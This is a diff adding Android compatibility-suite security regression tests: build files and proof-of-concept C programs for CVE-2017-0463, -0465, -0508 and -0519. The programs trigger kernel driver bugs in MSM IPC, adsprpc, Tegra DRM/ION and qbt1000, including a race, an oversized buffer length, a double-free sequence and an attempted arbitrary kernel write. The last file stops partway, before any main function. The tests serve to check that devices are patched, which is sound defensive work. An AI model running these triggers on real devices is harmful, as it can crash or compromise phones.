diff --git a/hostsidetests/security/securityPatch/CVE-2017-0463/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0463/Android.mk
new file mode 100644
index 0000000..d5422dc
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0463/Android.mk
@@ -0,0 +1,37 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License
+
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0463
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0463/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0463/poc.c
new file mode 100644
index 0000000..5758130
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0463/poc.c
@@ -0,0 +1,85 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <pthread.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <sys/syscall.h>
+#include <unistd.h>
+#include <errno.h>
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <netinet/ip.h>
+
+#define AF_MSM_IPC 27
+#define MSM_IPC_ADDR_NAME 1
+#define IPC_ROUTER_IOCTL_BIND_CONTROL_PORT _IOR(0xC3, 4, unsigned int)
+#define M 300
+
+void *trigger(void *p);
+
+struct msm_ipc_port_addr {
+ uint32_t node_id;
+ uint32_t port_id;
+};
+
+struct msm_ipc_port_name {
+ uint32_t service;
+ uint32_t instance;
+};
+
+struct msm_ipc_addr {
+ unsigned char addrtype;
+ union {
+ struct msm_ipc_port_addr port_addr;
+ struct msm_ipc_port_name port_name;
+ } addr;
+};
+
+struct sockaddr_msm_ipc {
+ unsigned short family;
+ struct msm_ipc_addr address;
+ unsigned char reserved;
+};
+
+struct sockaddr_msm_ipc addr;
+
+void *trigger(void *p) {
+ int f = socket(AF_MSM_IPC, 2, 0);
+ ioctl(f, IPC_ROUTER_IOCTL_BIND_CONTROL_PORT, 0);
+
+ addr.family = AF_MSM_IPC;
+ addr.address.addrtype = MSM_IPC_ADDR_NAME;
+ bind(f, (struct sockaddr *)&addr, sizeof(addr));
+
+ close(f);
+ return NULL;
+}
+
+int main()
+{
+ int i;
+ pthread_t th0[M];
+
+ for (i = 0; i < M; i++) {
+ pthread_create(&th0[i], NULL, trigger, NULL);
+ }
+
+ usleep(100000);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0465/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0465/Android.mk
new file mode 100644
index 0000000..1107a59
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0465/Android.mk
@@ -0,0 +1,36 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0465
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0465/local_poc.h b/hostsidetests/security/securityPatch/CVE-2017-0465/local_poc.h
new file mode 100644
index 0000000..7c356b9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0465/local_poc.h
@@ -0,0 +1,75 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __CMD_H__
+#define __CMD_H__
+
+#define _IOC_NRBITS 8
+#define _IOC_TYPEBITS 8
+
+/*
+ * Let any architecture override either of the following before
+ * including this file.
+ */
+
+#ifndef _IOC_SIZEBITS
+# define _IOC_SIZEBITS 14
+#endif
+
+#ifndef _IOC_DIRBITS
+# define _IOC_DIRBITS 2
+#endif
+
+#define _IOC_NRMASK ((1 << _IOC_NRBITS)-1)
+#define _IOC_TYPEMASK ((1 << _IOC_TYPEBITS)-1)
+#define _IOC_SIZEMASK ((1 << _IOC_SIZEBITS)-1)
+#define _IOC_DIRMASK ((1 << _IOC_DIRBITS)-1)
+
+#define _IOC_NRSHIFT 0
+#define _IOC_TYPESHIFT (_IOC_NRSHIFT+_IOC_NRBITS)
+#define _IOC_SIZESHIFT (_IOC_TYPESHIFT+_IOC_TYPEBITS)
+#define _IOC_DIRSHIFT (_IOC_SIZESHIFT+_IOC_SIZEBITS)
+
+/*
+ * Direction bits, which any architecture can choose to override
+ * before including this file.
+ */
+
+#ifndef _IOC_NONE
+# define _IOC_NONE 0U
+#endif
+
+#ifndef _IOC_WRITE
+# define _IOC_WRITE 1U
+#endif
+
+#ifndef _IOC_READ
+# define _IOC_READ 2U
+#endif
+
+#define _IOC_TYPECHECK(t) (sizeof(t))
+#define _IOC(dir,type,nr,size) \
+ (((dir) << _IOC_DIRSHIFT) | \
+ ((type) << _IOC_TYPESHIFT) | \
+ ((nr) << _IOC_NRSHIFT) | \
+ ((size) << _IOC_SIZESHIFT))
+
+/* used to create numbers */
+#define _IO(type,nr) _IOC(_IOC_NONE,(type),(nr),0)
+#define _IOR(type,nr,size) _IOC(_IOC_READ,(type),(nr),(_IOC_TYPECHECK(size)))
+#define _IOW(type,nr,size) _IOC(_IOC_WRITE,(type),(nr),(_IOC_TYPECHECK(size)))
+#define _IOWR(type,nr,size) _IOC(_IOC_READ|_IOC_WRITE,(type),(nr),(_IOC_TYPECHECK(size)))
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0465/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0465/poc.c
new file mode 100644
index 0000000..f92f5ba
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0465/poc.c
@@ -0,0 +1,88 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include "local_poc.h"
+#include <sys/wait.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <time.h>
+#include <sys/types.h>
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+struct remote_buf {
+ void *pv; /* buffer pointer */
+ ssize_t len; /* length of buffer */
+};
+
+union remote_arg {
+ struct remote_buf buf; /* buffer info */
+ uint32_t h; /* remote handle */
+};
+
+#define remote_arg_t union remote_arg
+
+struct fastrpc_ioctl_invoke {
+ uint32_t handle; /* remote handle */
+ uint32_t sc; /* scalars describing the data */
+ remote_arg_t *pra; /* remote arguments list */
+};
+
+struct fastrpc_ioctl_invoke_fd {
+ struct fastrpc_ioctl_invoke inv;
+ int *fds; /* fd list */
+};
+
+#define FASTRPC_IOCTL_INVOKE_FD _IOWR('R', 4, struct fastrpc_ioctl_invoke_fd)
+
+int main(int argc, char **argv) {
+ int fd;
+ int ret, i;
+ struct fastrpc_ioctl_invoke_fd arg;
+ struct fastrpc_ioctl_invoke *inv;
+ void *ptr;
+
+ unsigned long long seed = 13234300;
+ srand((unsigned)seed);
+ fd = open("/dev/adsprpc-smd", O_RDONLY);
+
+ ptr = malloc(0xFFFF);
+
+ arg.fds = NULL;
+ inv = &arg.inv;
+
+ inv->sc = 0x00020111;
+ inv->pra = (remote_arg_t *)malloc(4 * sizeof(remote_arg_t));
+ inv->pra[0].buf.pv = ptr;
+ inv->pra[0].buf.len = 0x0000FFFF;
+
+ memset(inv->pra[0].buf.pv, 0xFF, 0xFFFF);
+ inv->pra[1].buf.pv = ptr;
+ inv->pra[1].buf.len = 0x0000FFFF;
+
+ inv->pra[2].buf.pv = (void*)((char *)inv->pra[0].buf.pv + 0xFFFF - 128);
+ inv->pra[2].buf.len = (unsigned long)0xFFFFFFFFFFFFFFFF -
+ (unsigned long)inv->pra[2].buf.pv + 128;
+
+ ret = ioctl(fd, FASTRPC_IOCTL_INVOKE_FD, &arg);
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0508/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0508/Android.mk
new file mode 100644
index 0000000..194cd9f
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0508/Android.mk
@@ -0,0 +1,37 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License
+
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0508
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0508/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0508/poc.c
new file mode 100644
index 0000000..5ed3e9b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0508/poc.c
@@ -0,0 +1,195 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <dirent.h>
+#include <dlfcn.h>
+#include <fcntl.h>
+#include <linux/sched.h>
+#include <pthread.h>
+#include <sched.h>
+#include <stdio.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <sys/resource.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/time.h>
+#include <unistd.h>
+#include <unistd.h>
+
+#define DRM_TEGRA_GEM_CREATE 0x00
+#define DRM_TEGRA_GEM_MMAP 0x01
+#define DRM_TEGRA_SYNCPT_READ 0x02
+#define DRM_TEGRA_SYNCPT_INCR 0x03
+#define DRM_TEGRA_SYNCPT_WAIT 0x04
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_GET_SYNCPT 0x07
+#define DRM_TEGRA_SUBMIT 0x08
+#define DRM_TEGRA_GET_SYNCPT_BASE 0x09
+#define DRM_TEGRA_GEM_SET_TILING 0x0a
+#define DRM_TEGRA_GEM_GET_TILING 0x0b
+#define DRM_TEGRA_GEM_SET_FLAGS 0x0c
+#define DRM_TEGRA_GEM_GET_FLAGS 0x0d
+#define DRM_TEGRA_GET_CLK_RATE 0x0e
+#define DRM_TEGRA_SET_CLK_RATE 0x0f
+#define DRM_TEGRA_START_KEEPON 0x10
+#define DRM_TEGRA_STOP_KEEPON 0x11
+#define DRM_TEGRA_GET_CLK_CONSTRAINT 0x12
+#define DRM_TEGRA_SET_CLK_CONSTRAINT 0x13
+
+struct drm_tegra_gem_create {
+ __u64 size;
+ __u32 flags;
+ __u32 handle;
+};
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+struct drm_tegra_constraint {
+ /* channel context (from opening a channel) */
+ __u64 context;
+ /* index identifying the clock. One of HOST1X_CLOCK_INDEX_* */
+ __u32 index;
+ /* constraint type. One of HOST1X_USER_CONSTRAINT_TYPE_* */
+ __u32 type;
+ /* numeric value for type */
+ __u32 rate;
+ __u32 pad;
+};
+struct drm_prime_handle {
+ __u32 handle;
+
+ /** Flags.. only applicable for handle->fd */
+ __u32 flags;
+
+ /** Returned dmabuf file descriptor */
+ __s32 fd;
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IO(nr) _IO(DRM_IOCTL_BASE, nr)
+#define DRM_IOR(nr, type) _IOR(DRM_IOCTL_BASE, nr, type)
+#define DRM_IOW(nr, type) _IOW(DRM_IOCTL_BASE, nr, type)
+#define DRM_IOWR(nr, type) _IOWR(DRM_IOCTL_BASE, nr, type)
+#define DRM_IOCTL_TEGRA_GEM_CREATE \
+ DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GEM_CREATE, struct drm_tegra_gem_create)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL \
+ DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, \
+ struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_GET_CLK_CONSTRAINT \
+ DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GET_CLK_CONSTRAINT, \
+ struct drm_tegra_constraint)
+#define DRM_IOCTL_PRIME_HANDLE_TO_FD DRM_IOWR(0x2d, struct drm_prime_handle)
+
+int g_fd = -1;
+int g_ion_fd = -1;
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+int classes[] = {HOST1X_CLASS_HOST1X, HOST1X_CLASS_NVENC, HOST1X_CLASS_VI,
+ HOST1X_CLASS_ISPA, HOST1X_CLASS_ISPB, HOST1X_CLASS_GR2D,
+ HOST1X_CLASS_GR2D_SB, HOST1X_CLASS_VIC, HOST1X_CLASS_GR3D,
+ HOST1X_CLASS_NVJPG, HOST1X_CLASS_NVDEC};
+#define ION_IOC_MAGIC 'I'
+#define ION_IOC_IMPORT _IOWR(ION_IOC_MAGIC, 5, struct ion_fd_data)
+#define ION_IOC_FREE _IOWR(ION_IOC_MAGIC, 1, struct ion_handle_data)
+struct ion_fd_data {
+ int handle;
+ int fd;
+};
+struct ion_handle_data {
+ int handle;
+};
+
+int open_driver(void);
+void gem_create(void);
+void handle_to_fd(void);
+void ion_import(void);
+void ion_handle_free(void);
+
+int open_driver(void) {
+ const char* dev_path = "/dev/dri/renderD129";
+ g_fd = open(dev_path, O_RDONLY);
+ if (g_fd < 0) {
+ return g_fd;
+ }
+
+ dev_path = "/dev/ion";
+ g_ion_fd = open(dev_path, O_RDONLY);
+ if (g_ion_fd < 0) {
+ return g_ion_fd;
+ }
+ return 1;
+}
+
+char* g_buf = NULL;
+void* g_context = NULL;
+int g_gem_handle = -1;
+int g_dmabuf_fd = -1;
+int g_ion_handle = -1;
+
+void gem_create(void) {
+ struct drm_tegra_gem_create para = {0, 0, 0};
+ para.size = 1024;
+ ioctl(g_fd, DRM_IOCTL_TEGRA_GEM_CREATE, ¶);
+ g_gem_handle = para.handle;
+}
+void handle_to_fd(void) {
+ struct drm_prime_handle para = {0, 0, 0};
+ para.handle = g_gem_handle;
+ ioctl(g_fd, DRM_IOCTL_PRIME_HANDLE_TO_FD, ¶);
+ g_dmabuf_fd = para.fd;
+}
+void ion_import(void) {
+ struct ion_fd_data para = {0, 0};
+ para.fd = g_dmabuf_fd;
+ ioctl(g_ion_fd, ION_IOC_IMPORT, ¶);
+ g_ion_handle = para.handle;
+}
+void ion_handle_free(void) {
+ struct ion_handle_data para = {0};
+ para.handle = g_ion_handle;
+ ioctl(g_ion_fd, ION_IOC_FREE, ¶);
+}
+
+int main() {
+ if (open_driver() < 0) {
+ return -1;
+ }
+ gem_create();
+ handle_to_fd();
+ ion_import();
+ ion_handle_free();
+ close(g_fd);
+ close(g_dmabuf_fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0519/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0519/Android.mk
new file mode 100644
index 0000000..ca3ffb6
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0519/Android.mk
@@ -0,0 +1,37 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0519
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
+
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0519/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0519/poc.c
new file mode 100644
index 0000000..767a671
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0519/poc.c
@@ -0,0 +1,253 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+static const char *dev = "/dev/qbt1000";
+
+#define QBT1000_SNS_SERVICE_ID 0x138 /* From sns_common_v01.idl */
+#define QBT1000_SNS_SERVICE_VER_ID 1
+#define QBT1000_SNS_INSTANCE_INST_ID 0
+
+#define SNS_QFP_OPEN_RESP_V01 0x0020
+
+#define QMI_REQUEST_CONTROL_FLAG 0x00
+#define QMI_RESPONSE_CONTROL_FLAG 0x02
+#define QMI_INDICATION_CONTROL_FLAG 0x04
+#define QMI_HEADER_SIZE 7
+
+#define OPTIONAL_TLV_TYPE_START 0x10
+
+enum elem_type {
+ QMI_OPT_FLAG = 1,
+ QMI_DATA_LEN,
+ QMI_UNSIGNED_1_BYTE,
+ QMI_UNSIGNED_2_BYTE,
+ QMI_UNSIGNED_4_BYTE,
+ QMI_UNSIGNED_8_BYTE,
+ QMI_SIGNED_2_BYTE_ENUM,
+ QMI_SIGNED_4_BYTE_ENUM,
+ QMI_STRUCT,
+ QMI_STRING,
+ QMI_EOTI,
+};
+
+volatile int cont = 1;
+
+struct qmi_header {
+ unsigned char cntl_flag;
+ uint16_t txn_id;
+ uint16_t msg_id;
+ uint16_t msg_len;
+} __attribute__((__packed__));
+
+struct qseecom_handle {
+ void *dev;
+ unsigned char *sbuf;
+ uint32_t sbuf_len;
+};
+
+enum qbt1000_commands {
+ QBT1000_LOAD_APP = 100,
+ QBT1000_UNLOAD_APP = 101,
+ QBT1000_SEND_TZCMD = 102
+};
+
+struct qbt1000_app {
+ struct qseecom_handle **app_handle;
+ char name[32];
+ uint32_t size;
+ uint8_t high_band_width;
+};
+
+struct qbt1000_send_tz_cmd {
+ struct qseecom_handle *app_handle;
+ uint8_t *req_buf;
+ uint32_t req_buf_len;
+ uint8_t *rsp_buf;
+ uint32_t rsp_buf_len;
+};
+
+struct msm_ipc_port_addr {
+ uint32_t node_id;
+ uint32_t port_id;
+};
+
+struct msm_ipc_port_name {
+ uint32_t service;
+ uint32_t instance;
+};
+
+struct msm_ipc_addr {
+ unsigned char addrtype;
+ union {
+ struct msm_ipc_port_addr port_addr;
+ struct msm_ipc_port_name port_name;
+ } addr;
+};
+
+/*
+ * Socket API
+ */
+
+#define AF_MSM_IPC 27
+
+#define PF_MSM_IPCAF_MSM_IPC
+
+#define MSM_IPC_ADDR_NAME 1
+#define MSM_IPC_ADDR_ID 2
+
+struct sockaddr_msm_ipc {
+ unsigned short family;
+ struct msm_ipc_addr address;
+ unsigned char reserved;
+};
+
+struct qbt1000_app app = {0, {0}, 0, 0};
+
+static int get_fd(const char *dev_node) {
+ int fd;
+ fd = open(dev_node, O_RDWR);
+ if (fd < 0) {
+ cont = 0;
+ exit(EXIT_FAILURE);
+ }
+
+ return fd;
+}
+
+static void leak_heap_ptr(int fd) {
+ void *addr = NULL;
+ app.app_handle = (void *)&addr;
+ app.size = 32;
+ ioctl(fd, QBT1000_LOAD_APP, &app);
+}
+
+static void arb_kernel_write_send_tzcmd(int fd) {
+ struct qseecom_handle hdl = {0, 0, 0};
+ struct qbt1000_send_tz_cmd cmd = {0, 0, 0, 0, 0};
+
+ hdl.sbuf = (void *)0xABADACCE55000000;
+ cmd.app_handle = &hdl;
+ cmd.req_buf = cmd.rsp_buf = malloc(4096);
+ cmd.req_buf_len = cmd.rsp_buf_len = 4096;
+
+ ioctl(fd, QBT1000_SEND_TZCMD, &cmd);
+}
+
+static void recv_msgs(int fd) {
+ struct msghdr msg = {0, 0, 0, 0, 0, 0, 0};
+ struct iovec io = {0, 0};
+ struct sockaddr_msm_ipc addr = {0, {0, {{0, 0}}}, 0};
+ struct msm_ipc_addr address = {0, {{0, 0}}};
+ uint8_t *ptr;
+ struct qmi_header *hdr;
+ int count = 1;
+
+ io.iov_base = malloc(4096);
+ memset(io.iov_base, 0, 4096);
+ io.iov_len = 4096;
+
+ msg.msg_iovlen = 1;
+ msg.msg_iov = &io;
+ msg.msg_name = &addr;
+ msg.msg_namelen = sizeof(addr);
+
+ while (cont) {
+ recvmsg(fd, &msg, MSG_CMSG_CLOEXEC);
+ memset(io.iov_base, 0, 128);
+ hdr = io.iov_base;
+
+ hdr->cntl_flag = QMI_RESPONSE_CONTROL_FLAG;
+ hdr->txn_id = count++;
+ hdr->msg_id = SNS_QFP_OPEN_RESP_V01;
+ hdr->msg_len = 3;
+
+ ptr = (uint8_t *)((char *)io.iov_base + sizeof(*hdr));
+
+ *ptr = OPTIONAL_TLV_TYPE_START;
+ ptr++;
+ *ptr = 0;
+ ptr++;
+ *ptr = 0;
+ sendmsg(fd, &msg, MSG_CMSG_CLOEXEC);
+ }
+}
+
+#define BUILD_INSTANCE_ID(vers, ins) (((vers)&0xFF) | (((ins)&0xFF) << 8))
+static void setup_ipc_server(void) {
+ int fd;
+ struct sockaddr_msm_ipc addr = {0, {0, {{0, 0}}}, 0};
+ fd = socket(AF_MSM_IPC, SOCK_DGRAM, 0);
+
+ if (fd < 0) {
+ exit(EXIT_FAILURE);
+ }
+
+ addr.family = AF_MSM_IPC;
+ addr.address.addrtype = MSM_IPC_ADDR_NAME;
+ addr.address.addr.port_name.service = QBT1000_SNS_SERVICE_ID;
+ addr.address.addr.port_name.instance = BUILD_INSTANCE_ID(
+ QBT1000_SNS_SERVICE_VER_ID, QBT1000_SNS_INSTANCE_INST_ID);
+
+ bind(fd, (struct sockaddr *)&addr, sizeof(addr));
+ recv_msgs(fd);
+}
+
+static void *leak_ptr(void *ignore) {
+ void *save;
+ while (cont) {
+ if (app.app_handle != NULL) {
+ save = *app.app_handle;
+ if (save != NULL) {
+ break;
+ }
+ }
+ }
+ return NULL;
+}
+
+static void *do_ipc_stuff(void *ignore) {
+ setup_ipc_server();
+ return NULL;
+}
+
